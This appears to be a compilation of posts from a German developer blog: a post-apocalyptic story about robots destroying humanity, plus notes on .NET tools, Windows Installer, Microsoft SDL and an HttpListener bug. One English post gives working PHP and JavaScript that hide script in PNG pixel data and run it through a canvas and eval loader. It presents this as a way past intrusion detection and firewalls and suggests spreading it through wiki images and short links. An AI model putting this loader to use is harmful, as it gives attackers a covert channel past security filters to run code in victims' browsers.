Keine Ahnung ob die was taugen, aber vielleicht helfen sie dem einen oder anderen dabei eine Idee für ein eigenes Spiel zu bekommen.

Vorgeschichte

Wir, die wir noch leben, sind die letzten Vertreter der Menschlichen Rasse. Jahrtausende lang haben wir die Erde bevölkert, unsere Anzahl ging in die Milliarden und plötzlich…

Außer uns, wir die die Wächter genannt werden, gibt es nur noch ein paar wenige. Es sind vielleicht gerade mal ein paar tausend, welche gut behütet, tief unter der Erde, in ihren Cryogenischen Schlafkammern liegen und darauf warten, dass wir sie wieder wecken.

Aber die Zeit ist noch nicht reif. Wir würden untergehen, sobald wir wieder zurück an die Oberfläche gehen. Lange können wir aber nicht mehr warten. Die Störungen und Komplettausfälle der Cryogenischen Schlafkammern häufen sich und wir haben nicht mehr das Wissen und die Technik alle Schäden zu beheben. Es sind schon einige dadurch in ihren Schlafkammern gestorben.

Vielleicht ist es ja unser Schicksal, dass uns unsere eigenen Schöpfungen vernichten. Keiner weis mehr genau was damals geschah und warum wir verloren haben. Die Archive sind auch nicht mehr vollständig. Manchmal vermute ich, dass bestimmte Teile gezielt gelöscht wurden.

Ich habe versucht die einzelnen Fragmente, welche noch erhalten waren, wieder zu einem Gesamten zusammenzufügen, aber es gibt immer noch viel zu viel, was unklar oder vielleicht für immer verloren ist.

Das einzige was ich mit absoluter Gewissheit sagen kann ist, dass wir selbst an unserer jetzigen Lage schuld sind. Vielleicht ist es besser wenn ich dir das wenige was ich weis erzähle.

Den Berichten zufolge fing alles kurz nach Anfang des 2. Jahrtausends an. Das damalige Weltweite Datennetz, früher als Internet bekannt, befand sich gerade im Umbruch. Durch technische Neuerungen war es jetzt möglich sich über ein Interface, welches im Gehirn implantiert wurde, direkt in das Netz einzuklinken. Die Kommunikationsmöglichkeiten explodierten ins schier
Grenzenlose und viele Menschen verbrachten mehr Zeit in dieser Virtuellen Realität als im wirklichen Leben.

Wenige Jahre später kollabierte das Netz, warum ist mir unklar. Manche Archivdateien enthalten Hinweise auf einen neuartigen Computervirus, welcher Künstliche Intelligenz besäße, andere wiederrum deuten darauf hin, dass das Militär daran schuld wäre.

Der Zusammenbruch des Netzes hatte zur Folge, dass viele Computersysteme verrückt spielten. Das Weltweite Finanzsystem brach vollständig zusammen. Da sich jeder auf das Netz verlassen hatte, gab es auch keine Kommunikation mehr.

Als man dann nach ein paar Tagen wieder das Netz hergestellt hatte, waren viele Daten verloren. Auch die Kommunikation funktionierte nicht mehr richtig. Es gab einige Gebiete auf der Welt, welche man einfach nicht mehr erreichen konnte.

Viele Menschen wunderten sich darüber, machten sich aber wenig Sorgen. Man hoffte darauf, dass bald wieder alles besser würde. Aber stattdessen wurden es immer mehr Gebiete, welche nicht mehr zu erreichen waren. Am Anfang waren es nur Dörfer in abgelegenen Gebieten. Aber bald waren es auch Städte und schnell mehrten sich die besorgten Stimmen. Da man selbst kaum noch das
Haus verlies, den schließlich konnte man durch das Netz auch von zuhause aus arbeiten, wusste keiner genau, was wirklich geschah.

Erst als man in der Ferne ein Grollen und Donnern hörte, wurden den Menschen klar, warum die  anderen nicht mehr zu erreichen waren. Es war Krieg.

Aber wer kämpfte gegen wenn und warum? Das Militär schwieg auf die Fragen der Bevölkerung und auch die Presse brachte keine Nachrichten darüber. Es war so, als ob etwas schreckliches geschehen wäre und keiner durfte etwas darüber erzählen.

Tage später wusste man warum das Militär schwieg. Das Militär kämpfte gegen Roboter. Manche waren fast 10 Meter groß, andere gerade mal so groß wie ein Mensch. Aber sie schienen unzerstörbar zu sein. Für jeden der fiel, tauchte ein neuer auf und bald wurden die Frontlinien überrannt. Die
wenigen Einheiten, welchen die Flucht gelangt war, erzählten von grausamen Gemetzeln. Manche erzählten, dass diese Roboter Kampfmaschinen des Militärs waren, welche sich jetzt gegen ihre Schöpfer wandten.

Einige wenige erzählten, dass es gar weit hinter den Linien noch grausamere Maschinen gab, welche die anderen steuerten.

Es kam was kommen musste, man entschied sich Nukleare Waffen gegen den Feind einzusetzen. Die entsprechende Order wurde über das Netz weiter gegeben und man merkte erst kurz vor der Explosion er ersten Bomben, dass das Netz vom Feind gesteuert wurde. die Bomben fielen nicht auf den Feind, sondern auf uns selbst.

Die wenigen welche überlebten, retteten sich in die Berge, wohin die Roboter nicht kommen konnten und gruben sich Bunker, welche tief in die Erde reichten. Dort liegen sie nun, in ihren Cryogenischen Schlafkammern und warten auf den Tag, wo sie wieder zurück auf die Oberfläche kommen
können.

Jetzt weist du alles, was auch ich weis. Jeden Monat werden wir Wächter geweckt um Sonden zu entsenden, mit welchen wir prüfen ob es noch Feinde dort oben gibt. Es wurden schon lange keine mehr gesehen, aber wir wissen das sie schlau sind. Sie warten, sie warten darauf, dass wir wieder zurück kommen und sie uns komplett vernichten können.

Vielleicht kommt ja irgendwann einmal der Tag, an welchem wir wieder den Himmel sehen werden. Vielleicht gibt es ja sogar noch andere wie uns, welche sich auch retten konnten.

Das Erwachen

Mensch ist mir kalt war mein erster Gedanke.  Ich brauchte eine Weile um mich zu orientieren, aber plötzlich wurde es mir schlagartig klar wo ich mich befand. Ich war in einer Cryogenischen Schlafkammer und irgendwas hatte das Aufweckprogramm gestartet. War es etwa endlich soweit? Konnten wir wieder zurück kehren auf die Oberfläche?

Mit einem Zischen glitt die Luke der Cryogenischen Schlafkammer auf und gab den Blick auf die vielen anderen Schlafkammern frei. Die Schlafkammern waren in einem Kreis um den Zentralen Schacht aufgestellt, welcher sich hunderte von Stockwerken nach oben und nach unten erstreckte.
Es waren so viele Schlafkammern, alle waren besetzt, aber wir hatten trotzdem nicht alle retten können.

Was war mit ihnen geschehen? Hatten die Maschinen sie wie die anderen dahin gemetzelt. Nur um den einen Befehl zu Ende zu führen, der lautete: Tötet alle Menschen. Es war grausam. Die Maschinen stürmten über alle unsere Verteidungsstellungen hinweg als ob sie gar nicht vorhanden wären. Für jede von uns zerstörte Maschine tauchten 2 weitere auf.

Am Anfang dachten wir noch wir könnten gewinnen, aber selbst der verzweifelte Einsatz der Atombomben brachte nichts mehr. Die Maschinen hatten sich schon zu sehr verbreitet. Wir zerstörten unsere eigene Welt um unsere eigenen Geschöpfe zu zerstören.

Ich bin kein besonders Gläubiger Mensch, aber war es nicht Ironie das wir versuchten Gott nachzueifern und so stolz über unsere Schöpfung waren, das wir ganz übersehen hatten, dass sie genauso Fehlerhaft war wie ihre Schöpfer. Als wir dies merkten war es zu spät. Viel zu spät. Zum Ende des Krieges hatten von den Aber Milliarden Menschen die ehemals auf der Erde lebten, nur noch ein paar Millionen überlebt.

Bei der großen Flucht vor den Maschinen starben in wenigen Tagen noch mehr Menschen, als in den Wochen zuvor. Eiligst wurden Bunker mehrere Kilometer tief in die Erde getrieben und dort soviel Material untergebracht wie möglich. Die ganze Zeit über mussten die Maschinen abgelenkt werden, damit sie unsere Flucht in die Bunker nicht bemerkten. Viele gute Soldaten starben zu dieser Zeit. Es ging schon lange nicht mehr um den Sieg über der Feind. Es ging um das nackte Überleben der Menschheit.

Beinahe hätten die Maschinen es geschafft den Hauptbunker zu finden, aber ein verzweifelter Einsatz einer der letzten Truppen stoppte sie lange genug. Die Soldaten gingen ohne zu Zögern in den Tod. Sie stürmten auf die Maschinen zu, durchbrachen ihre Linien und zündeten in ihrer Mitte eine der letzten noch vorhandenen Atombomben. Die Wucht der Explosion spürte man noch im Bunker.

Sie war so gewaltig, dass die Eingänge zum Bunker verschüttet wurden, was uns wohl das Leben rettete. Für die Maschinen waren wir nicht mehr da. Keiner weis wie viele Menschen die Maschinen noch töteten. Eine Weile lang hatten wir noch Kontakt zu den Satelliten, aber dieser brach auch bald ab, als die Maschinen die Satelliten zerstörten.

Kontakt!

Wir waren nun seit etwa 2 Stunden wieder aus unserem Cryogenischem Schlaf erwacht und noch immer wusste keiner was den geschehen wahr. Das Aufweckprogramm wurde allem Anschein nach von außen gestartet, nur konnte keiner feststellen von wem.

Viele von den Zivilisten irrten Ziel und Planlos durch die Gänge und Ebenen. Viele hatten es damals im letzten Moment noch in den Bunker geschafft und wurden einfach in die erstbesten Schlafkammern untergebracht die man finden konnte. Viele Familien wurden dadurch auseinander gerissen.

Außerdem wahr das übrig gebliebene Technische und Medizinische Personal durch das gleichzeitige Aufwecken aller Personen so sehr überfordert, dass man einige in ihren Schlafkammern vergessen hatte. Dies währe nicht weiter schlimm gewesen, aber nicht jede hatte sich von selbst geöffnet. Man fand Tage später nur noch wenige davon Lebend in ihren Schlafkammern an.

Unser größtes Problem aber war, dass es nicht genügend Vorräte gab. Am Anfang wollte man die Leute einfach wieder in die Cryogenischen Schlafkammern zurück schicken, aber durch einen Computerfehler konnten die Schlafkammern nicht mehr neu benutzt werden.

Unser anderes Problem war, dass wir noch nicht mal feststellen konnten, wie es im Moment auf der Oberfläche aussah. Alle unsere Sonden wahren zerstört oder konnten von uns nicht mehr erreicht werden. Unsere Offiziere beschlossen deshalb, dass man eine Kundschafter Truppe nach oben schicken sollte um das Gelände zu erkunden und eine kleine Basis zu errichten.

Mein Zug war dann schließlich derjenige dem diese Aufgabe zufiel. So richtig scharf wahren wir nicht darauf, aber es wahr auf jeden Fall besser, als weiterhin hier unten zu bleiben. Das Chaos nahm von Minute zu Minute zu und es gab sogar schon Gerüchte darüber, dass die Reaktoren im Moment aufgrund der vielen Maschinen die durch das Aufwecken gestartet worden wahren, schon mehr als nur überlastet währen.

Vorsichtig traten wir aus dem dunklen Höhleneingang ins helle Tageslicht hinein. Geblendet Schloss ich kurz die Augen, rieß sie aber schnell wieder auf um einen Blick auf mein Strahlungsmesser zu werfen. Die Strahlung wahr nicht viel höher als normal. Dies wahr seltsam. Kurz bevor damals alle in den Cryogenischen Schlaf versetzt worden sind, hatte eine der letzten verbliebenen Einheiten in einer Verzweiflungstat eine Atombombe gezündet, um den vorrückenden Feind zu stoppen. Dies wahr in unmittelbarer Nähe geschehen, aber es gab überhaupt keine Anzeichen darüber.

Wir überprüften vorsichtig die nähere Umgebung, aber es wahr kein Feind zu entdecken. Dies wahr wirklich seltsam. Eigentlich hatten wir erwartet, dass die Bots auf uns warten würden. Es wahren Maschinen und als solche kannten sie keine Ungeduld. Maschinen hielten immer an ihrem Programm fest und laut diesem, würden sie einfach auf uns warten und uns nach unserem Auftauchen sofort wieder angreifen.

Was wahr geschehen? Wir befanden uns gerade auf dem Rückweg zum provisorischem Feldlager, als ich eine Funkeln auf einem Abhang sah. Ich gab meinen Kameraden ein Zeichen und vorsichtig krochen wir auf das etwas zu was dort in der Sonne so glitzerte.

At first… i don’t know if this is new, but if it is, then it will be interesting to see, for what it will be used…

Canvas is not very well known. First introduced by Apple and today implemented in browsers like Safari, Opera and Firefox.

For most people, it is only known for generating pictures and 3D Animations. But you can missuse it for bypassing ids, firewalls and so on…

I’m not good at explaining thing, but i will try it

For our example, we don’t obfuscate anything!

At first we have to know something about png files. Every pixel is build up from 4 Bytes.

Red, Green, Blue and the Alphachannel. To make it easier, we will only use Red, Green and Blue to store data in it.

The sideeffect of the not used Alphachannel is, that every forth byte, there is something useless in it and your code has some lowlevel obfuscating

At first, we need a code to generate the image which contains the malicious code.

Let’s call it badpicture.php

<?php
// Figure it out by yourself 
$strExploit = 'alert("xss");//';

$lngX = 0;
$lngY = 0;

// Make it big enough for your code...
$im = imagecreate(256, 5);

// Now here starts the interesting part
for ($lngPos = 0; $lngPos < strlen($strExploit); $lngPos+=3)
{
  $strByte1 = substr ($strExploit, $lngPos, 1);
  $strByte2 = substr ($strExploit, $lngPos+1, 1);
  $strByte3 = substr ($strExploit, $lngPos+2, 1);

  $objColor = ImageColorAllocate ($im, ord($strByte1), ord($strByte2), ord($strByte3));

  imagesetpixel($im, $lngX, $lngY, $objColor);

  $lngX++;

  if ($lngX >= 128)
  {
    $lngX = 0;
    $lngY++;
  }
}

// And now we send it to the browser
header ("Content-type: image/png");
imagepng($im); // output the stream directly
imagedestroy($im);
?>

Ok, Step one is done. What we now need, is a loader. For better reading, i have formated it and put the code in to a html document.

<html>
<body>
Nothing here to read...

<script>
var c=document.createElement("canvas");
g=c.getContext("2d");
i=new Image();
i.src="http://domain.tld/badpicture.php";
i.onload=function() {
  g.drawImage(this,0,0);
  o=g.getImageData(0,0,256,5).data;
  eval("d=String.fromCharCode("+o+").replace(/ÿ/g,'')");
  eval(d);
}
</script>

</body>
</html>

That’s all !

To extend this idea more, think about Steganography, Obfuscating the loader, Multistage Loaders, pre generated pictures with the correct file extension, PNG Compression…

Think about the attack vectors… generate a new entry in a wiki with legal content, with a normal picture (normal vor human eyes) and refer to this picture using tinyurl…

A short note has to be placed… Opera is using a Same URI Policy, so you have to do more, than only to generate a picture and place it somewhere. There are ways around it.

And remember… Canvas is part of the HTML 5 specification.

Canvas Example

So take a look at it, figure out how it works.

In two days, i will post an explanating of it and how this can be a problem for you.

Btw… It works only on firefox, opera and safari (as far as i know), and there are no alert and no xss Text inside

Man kann sehr einfach seine Klassen auf fehlende Prüfungen, fehlende Abfragen und noch einige andere Dinge testen lassen.

Besonderst hervorzuheben ist das Feature, dass Pex bei den Übergabeparametern verschiedene Inhalte übergibt, um darüber dann zu ermitteln, welche Inhalte nicht passen oder nicht sauber abgefangen werden.

Außerdem kann man mit Pex auch leicht noch fehlende Unittests erzeugen lassen.

Microsoft (ja von denen ist Pex) hat auf Channel 9 ein Video über Pex, zu welchem ihr hier kommen könnt:

Channel 9 Video zu Pex

Ein paar weitere gute Quellen zu Pex kann man hier finden:

Getting started with automated white box testing (and Pex)
Pex – Automated White box Testing for .NET
Pex Extensions auf Codeplex
Forum zu Pex bei Microsoft

Pex kommt bei mir im Moment zum gezielten Prüfen von Klassen zum Einsatz. Den Part mit dem Erzeugen von Unittests verwende ich nicht. Ich schreibe meine Unittests gerne selbst und habe gerade da die lieber die volle Kontrolle über das was ich mache.

Das Windows Update wollte mir das nicht geben. Laut dem liegt nichts für mein System als Update vor.

Hmmm…

Eine kurze Suche bei einer Suchmaschine erbrachte dann das folgende Blog:

Windows Installer Team Blog

Und dort war auch die Rede von einer neuen Version, welche man sich installieren kann.

Hier die Links:

Windows Installer 4.5 Englische Version

Windows Installer 4.5 Deutsche Version

Btw… die folgende Version ist für Vista x64:

Windows6.0-KB942288-v2-x64.msu

Und da nichts Fehlerfrei ist, was mehr als ein NOP als Befehl hat…

hier ein Update:

Update to MSI 4.5 (KB958655)

Das Update natürlich nur einspielen, wenn man Probleme ohne hat… ähm ja… klar… wie auch immer.

Grundlage des Ganzen ist ein von Microsoft erstelltes Secure Development Lifecycle (SDL) Optimization Model, nicht zu verwechseln mit Simple DirectMedia Layer (SDL), welches meiner Meinung nach als Ergänzung zu den Best Practices zu sehen ist.

Natürlich wird es auch wieder die Möglichkeit geben, über ein Zertifizierungsprogramm eines dieser netten Dokumente zu erhalten, welche einige zum Zimmertapezieren verwenden. Nicht das so ein Zertifikat vom Können des Besitzers zeugen würde… auswendig lernen kann jeder

Verfügbar wird das Ganze ab November sein. Ich bin echt mal gespannt, was Microsoft sich da so alles ausgedacht hat. Fakt ist, dass sie das Problem von Sicherheitsrisiken durch Fremdsoftware angehen wollen.

Lobenswert! Da können sich die OpenSource Frickler mal eine dicke Scheibe von Abschneiden.

Update

Eines der schon verfügbaren Tools kann man sich hier im Einsatz ansehen, oder hier herunter laden.

Aber wehe man muß bei den Unittests eine Datenbank berücksichtigen.

Da kommt man schnell ins Fummeln. Hier mal ein Hilfsscript, dort ein Backup, hier ein Restore und weil es Spaß macht, muß man alles wieder von vorne machen, sobald sich nur eine kleine Sache in der Datenbank geändert hat.

Und hier kommt dann NDbUnit ins Spiel.

NDbUnit ist aber nicht wie NUnit eine Unittestlösung mit Oberfläche, sondern wird direkt in den Source integriert.

Bleibt abzuwarten, ob sich hier in Zukunft noch was ändert. So wirklich glücklich bin ich über diese Lösung nicht…

Wer nur einen kurzen Blick drauf werfen will, der findet hier ein kleines Videobeispiel von NDbUnit.

Für mich selbst ist es im Moment nicht sinnvoll einsetzbar, da ich mit dem Dynamic Data Cache auf eine eigene Datenbankfremde Lösung setze.

Der Source stellt eine Implementierung des HttpListener als kleinen Webserver dar.

Bei den Unittests der einzelnen Module lief alles sauber durch. Aber dann beim Aufruf der Testseiten kamen seltsame Reaktionen vom Servermodul.

Das ging von sporadischem Aussteigen, sofortigem beenden und nur teilweisem senden der angeforderten Dateien.

Die Exceptions selbst waren erst einmal eindeutig:

Objekt: System.Net.HttpListenerResponse

Meldung:
Der Objektverweis wurde nicht auf eine Objektinstanz festgelegt.
Auf das verworfene Objekt kann nicht zugegriffen werden.

Ein Tip von TheUndeadable brachte mich auf die Suche nach einem verfrühten, sprich manuellem, Dispose des Objektes.

Nada… Es war nichts zu finden. Auch ein Hochdrehen des Loglevels brachte nichts.

Ok, abgesehen von einem blöden Fehler im Caching, welcher mit diesem Problem aber nichts zu tun hatte, aber auch gleich gefixt wurde.

Beim stöbern in der MSDN, bin ich dann über einen Querlink auf diese Seite gestossen:

Configuring HTTP and HTTPS

Und hier haute die Erinnerung mit einem mächtigen DU DEPP zu.

Klar… beim Einsatz des HttpListener muß man Windows das erstmal mitteilen, dass der Port und die IP-Adresse gebunden werden soll und das ein Listener drauf läuft.

Also flink ein

netsh http add iplisten ipaddress=0.0.0.0:80

gemacht und siehe da… es funktioniert wieder wie es soll.

Aber wieso Vista dann trotzdem einen Teil der Anfragen weiter geleitet hat… hier bin ich echt ratlos. Theoretisch hätte gar nichts passieren dürfen, oder wenigstens eine Exception geworfen werden müßte nach dem Motto “Access denied” o.ä.

Naja… Windows live

F-Secure Reverse Engineering Challenge

Level 1 hatte ich in ca. drei Stunden beendet. Ich hatte mich dummerweise an der Dokumentation meiner Schritte festgekrallt, anstatt einfach die Lösung zu erarbeiten.

Level 2 hat mich bisher erst zwei Stunden gekostet und ich habe im Moment schon ein paar Ansatzpunkte.

Wer auch immer das vorbereitet hat… Respekt !

Es dürfte nicht mehr viele Programmierer geben, welche direkt in Assembler programmieren können.

.NET Framework 3.5 SP1 und Visual Studio 2008 SP1 jetzt verfügbar!

Zusammenfassung:

• .NET 3.5 Download wird kleiner
• Optimierungen in der CLR, wodurch die Programme zwischen 20-45% schneller starten
• Programmausführung dadurch um ca. 10% ingesamt schneller
• WPF wurde erweitert, Probleme behoben
• Einführung von ASP.NET Dynamic Data um Webseiten noch Dynamischer zu machen (noch mehr zum lernen…)
• Damit Datenbankprogrammierer sich nicht langweilen, wurde mal eben noch ADO.NET Data Services und DO.NET Entity Framework eingeführt…
• Was fehlt? Genau… WCF hat natürlich auch neue Features bekommen…

Manchmal frage ich mich, ob Microsoft überhaupt weiß wohin sie wollen. Laufend neue Features, die Autoren der Bücher kommen nicht mehr hinterher und von uns Programmierern rede ich mal gar nicht.

Man kommt nicht umhin, sich bei .NET zu spezialisieren. Die wenigsten dürften ein tiefes Wissen in den gesamten .NET Bereichen haben.

Also dann…

Möge das pauken beginnen